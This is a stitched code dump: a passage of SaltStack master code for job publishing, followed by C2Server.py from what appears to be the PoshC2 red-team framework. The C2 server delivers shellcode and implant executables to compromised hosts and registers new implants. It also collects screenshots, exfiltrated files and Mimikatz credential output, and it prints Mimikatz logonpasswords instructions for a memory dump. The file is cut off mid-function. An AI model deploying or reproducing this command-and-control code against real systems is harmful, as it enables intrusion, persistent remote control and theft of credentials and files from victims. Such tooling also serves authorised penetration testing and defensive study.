nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from poshc2.server.Implant import Implant
from poshc2.server.Tasks import newTask
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.Colours import Colours
from poshc2.server.database.DBSQLite import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from poshc2.server.database.DBSQLite import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, get_c2_messages, database_connect
from poshc2.server.Payloads import Payloads
from poshc2.server.Config import PoshProjectDirectory, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, PayloadCommsHost, SocksHost
from poshc2.server.Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, PayloadCommsPort, urlConfig, BindIP, BindPort, ReportsDirectory
from poshc2.server.Config import DownloadURI, Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken
from poshc2.server.Config import Pushover_APIUser, EnableNotifications
from poshc2.server.Cert import create_self_signed_cert
from poshc2.client.Help import logopic
from poshc2.Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
KEY = None
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(self, signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(self):
"""Respond to a HEAD request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_OPTIONS(self):
"""Respond to a HEAD request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_PUT(self):
"""Respond to a PUT request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
new_implant_url = get_newimplanturl()
self.cookieHeader = self.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except HTTPError as e:
self.send_response(e.code)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in self.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in self.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in self.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in self.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in self.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in self.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.SharpCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
else:
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(self):
"""Respond to a POST request."""
try:
self.server_version = ServerHeader
self.sys_version = ""
try:
content_length = int(self.headers['Content-Length'])
except:
content_length = 0
self.cookieHeader = self.headers.get('Cookie')
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = self.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(self.path), str(self.headers), post_data)
now = datetime.datetime.now()
result = get_implants_all()
if not result:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in self.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding on Windows and then Mimikatz can be run against it."
message = message + "\n E.g:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + 'safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz") or executedCmd.lower().startswith("pbind-command")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % self.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
self.send_response(res.getcode())
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except URLError as e:
try:
self.send_response(res.getcode())
except:
self.send_response(500)
self.send_header("Content-type", "text/html")
try:
self.send_header("Content-Length", len(sharpout))
except:
self.send_header("Content-Length", 0)
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
self.send_response(res.getcode())
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
def main(args):
httpd = ThreadedHTTPServer((BindIP, BindPort), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print(("Using existing project: %s" % PoshProjectDirectory) + Colours.GREEN)
database_connect()
C2 = get_c2server_all()
if ((C2[1] == PayloadCommsHost) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (PoshProjectDirectory)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error: different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % PoshProjectDirectory):
import shutil
shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
os.rename(PayloadsDirectory, "%s:_old" % PoshProjectDirectory)
os.makedirs(PayloadsDirectory)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], PayloadCommsHost, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", PayloadCommsHost, C2[3], "", "", "", "")
update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(PoshProjectDirectory)
if not os.path.exists(PoshProjectDirectory): os.makedirs(PoshProjectDirectory)
if not os.path.exists(DownloadsDirectory): os.makedirs(DownloadsDirectory)
if not os.path.exists(ReportsDirectory): os.makedirs(ReportsDirectory)
if not os.path.exists(PayloadsDirectory): os.makedirs(PayloadsDirectory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, PoshProjectDirectory, PayloadCommsPort, QuickCommand, DownloadURI, "", "", "", Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(PoshProjectDirectory)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("PayloadCommsHost", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % PoshProjectDirectory)
global KEY
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (BindIP, BindPort))
from datetime import date, datetime
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print (Colours.RED+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
else:
print (Colours.GREEN+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
print(Colours.END)
protocol = urlparse(PayloadCommsHost).scheme
if protocol == 'https':
if (os.path.isfile("%sposh.crt" % PoshProjectDirectory)) and (os.path.isfile("%sposh.key" % PoshProjectDirectory)):
try:
